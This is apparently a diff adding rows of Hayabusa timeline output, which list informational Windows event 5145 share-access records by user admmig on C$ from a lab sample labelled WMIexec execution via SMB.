+2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cf3e7fb699d07208e389d8d3e5c3e3b4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\635558b506364815e8348217e86fdf99  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\b8d89e2f35d492e69789bd504270dff4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\2af2b08e949ae5ebe946684d477a50d5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\e75ae269d8eb8c8fb7bdcce4082ff8c2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\64d113caa8b81caec5c21797931b5624  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\e9062794b3050c9564584baa07300c10  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\1e30da61ac8d97f7b17cdce57fb6a874  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\6f7a4225a199ad7894379512ca6ae50c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\313baced763e9e5054e7694d5594cde5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Temp  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\a1f231be2afa2e51dfc0a1f76644d2f7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\abccca8c6f96e1d3c686a69acb31b9a9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\c926f90d88838d450951cd6c5b41c961  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\3be4139a741b447ab35a2c788a2f4559  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#\d081d0c6a64c64fa9afe4e545f2eaa05  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
